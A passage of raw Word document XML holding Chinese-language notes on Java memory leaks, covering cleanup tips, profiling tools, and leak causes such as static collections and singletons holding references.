          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。另外建议几点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在确认一个对象无用后，将其所有引用显式的置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当类从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Jpanel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Jdialog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或其它容器类继承的时候，删除该对象之前不妨调用它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>removeall()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法；在设一个引用变量为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">null </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>值之前，应注意该引用变量指向的对象是否被监听，若有，要首先除去监听器，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>才可以赋空值；当对象是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Thread </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的时候，删除该对象之前不妨调用它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>interrupt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法；内存检测过程中不仅要关注自己编写的类对象，同时也要关注一些基本类型的对象，例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>int[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>char[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等等；如果有数据库连接，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">try…finally </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>结构，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">finally </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象和连接。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>好的测试工具。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81CB0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在开发中不能完全避免内存泄漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，关键要在发现有内存泄漏的时候能用好的测试工具迅速定位问题的所在。市场上已有几种专业检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内存泄漏的工具，它们的基本工作原理大同小异，都是通过监测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程序运行时，所有对象的申请、释放等动作，将内存管理的所有信息进行统计、分析、可视化。开发人员将根据这些信息判断程序是否有内存泄漏问题。这些工具包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Optimizeit Profiler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JProbe Profiler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JinSight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Rational </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>公司的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Purify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00393E19" w:rsidRDefault="00DE1F4D" w:rsidP="00E47FDC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>导致内存泄露的原因很明确：长生命周期的对象持有短生命周期对象的引用就很可能发生内存泄露，尽管短生命周期对象已经不再需要，但是因为长生命周期对象持有它的引用而导致不能被回收，这就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中内存泄露的发生场景。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>集合类，集合类仅仅有添加元素的方法，而没有相应的删除机制，导致内存被占用。这一点其实也不明确，这个集合类如果仅仅是局部变量，根本不会造成内存泄露，在方法栈退出后就没有引用了会被</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>正常回收。而如果这个集合类是全局性的变量（比如类中的静态属性，全局性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等即有静态引用或</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一直指向它），那么没有相应的删除机制，很可能导致集合所占用的内存只增不减，因此提供这样的删除机制或者定期清除策略非常必要。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>2.</w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DD3DCC">
          <w:rPr>
            <w:color w:val="000000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>单例模式</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。不正确使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DD3DCC">
          <w:rPr>
            <w:color w:val="000000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>单例模式</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是引起内存泄露的一个常见问题，单例对象在被初始化后将在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的整个生命周期中存在（以静态变量的方式），如果</w:t>
      </w:r>
      <w:r w:rsidRPr="0067590C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单例对象持有外部对象的引用，那么这个外部对象将不能被</w:t>
      </w:r>
      <w:r w:rsidRPr="0067590C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="0067590C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>正常回收，导致内存泄露</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
